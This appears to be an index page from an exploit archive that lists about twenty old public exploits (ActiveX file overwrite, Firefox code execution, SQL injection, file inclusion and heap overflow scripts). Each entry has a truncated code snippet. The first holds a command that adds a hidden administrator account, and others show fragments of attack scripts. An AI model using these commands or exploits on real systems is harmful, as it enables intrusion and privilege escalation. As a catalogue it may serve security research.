gdpicture-exec.txt

var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x42\x00\x0...

GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit

Exploit for unknown platform in category remote exploits ===================================================================== GdPicture Pro ActiveX gdpicture4s.ocx File Overwrite / Exec Exploit ===================================================================== object...

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit

No description provided by source. // Exploit by Michael Krax !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" html head titleFirewalling - Proof-of-Concept/title script function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the...

sunshop-blindsql.txt

!/usr/bin/perl -w use LWP::UserAgent; scripts : SunShop Version 3.5.1 Remote Blind Sql Injection scripts site : http://www.turnkeywebtools.com/sunshop/ Discovered By : irvian site : http://irvian.cn email : [email protected] print "\r\n+-----------------------------------------+\r\n"; print...

HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit

No description provided by source. ?php HLDS WebMod 0.48 rconpass Remote Heap Overflow Exploit Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew shir, skod.uk at gmail dot com 17/12/2007 Registers rconpass = "A"x16444: EAX 67E04955 wmm.67E04955 ECX 41414141 EDX 41414141 EBX...

Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit

Exploit for unknown platform in category remote exploits ====================================================================== Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit ====================================================================== Real Player rmoc3260.dll...

Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit

No description provided by source. Yahoo! Messenger 8.1.0.413 webcam Remote Crash Exploit 1.compile the dll. 2. choose "invite to view my webcam" to a contact id who is online using yahoo! messenger...

Mail Machine <= 3.989 Local File Inclusion Exploit

No description provided by source. !/usr/bin/perl -w Mail Machine Local File Include Exploit Vuln. v3.980, v3.985, v3.987, v3.988 and v3.989 ! Application homepage : http://www.mikesworld.net/mailmachine.shtml ! Author : H4 / Team XPK ! Contact : [email protected]...

extreme-rfi.txt

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on 3.0 Pre Final And other Versions Should be infected / Script info Mod Title: Extreme PHPBB 3.0 Mod Version: 3.0 Pre Final Author: danb00 Demo:...

Extreme PHPBB2 Remote File Inclusion

Hello,, EclipseBB Remote File Inclusion .. With exploit : Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on 3.0 Pre Final And other Versions Should be infected / Script info Mod Title: Extreme PHPBB 3.0 Mod Version: 3...

MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db-escapestring. They don't corrected the function this is a choice ... the bad and they forgot to...

HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit

Exploit for multiple platform in category remote exploits ==================================================================== HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit ==================================================================== !/usr/bin/perl HP Mercury Qualit...

PHP 4.4.55.2.1 - shmop Local Code Execution

PHP 4.4.55.2.1 - shmop Local Code Execution ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the...

MOPB-01-2007:PHP 4 Userland ZVAL Reference Counter Overflow Vulnerability

Summary The Month of PHP Bugs starts with a PHP 4 security vulnerability that exploits a problem known for many years among the PHP developers. When a PHP application is run in PHP 4 it can overflow the variable reference counter because it is only 16 bit wide. Whenever this happens it will resul...

CS-Gallery 2.0 (index.php album) Remote File Include Exploit

No description provided by source. ?php //File Inclusion Exploit for CSGallery = 2.0 //Found and Exploit Coded by burncycle - burncycleathotmaildotde //| //Vendor: http://www.cschneider.de/ //Dork: . www.cschneider.info //| //Bug in "index.php": //.. //$codefile=$POST'album'.'/code.php';...

Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit

Exploit for unknown platform in category web applications =================================================================== Quick.Cms.Lite = 0.3 Cookie sLanguage Local File Include Exploit =================================================================== ? print ' ::::::::: :::::::::: ::: :::...

PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting SQL Injection Code Execution

PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting SQL Injection Code Execution !/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + +...

PHP Proxima <= v.6 completepack Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================================= PHP Proxima = v.6 completepack Remote Code Execution Exploit ============================================================= !/usr/bin/php -q -d shortopentag=on ? $devilteam = "...

Simplog <= 0.9.2 (s) Remote Commands Execution Exploit

Exploit for unknown platform in category web applications ====================================================== Simplog \r\n"; die; / software site: http://www.simplog.or...

CuteNews 1.4.1 - function.php Local File Inclusion

CuteNews 1.4.1 - function.php Local File Inclusion CuteNews 1.4.1 user Hash password Finder CuteNews 1.4.1 and Below user Hash password Finder Security ? . Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :. Happy Norouz PERSIAN new year celebration Greetz to all Iranian...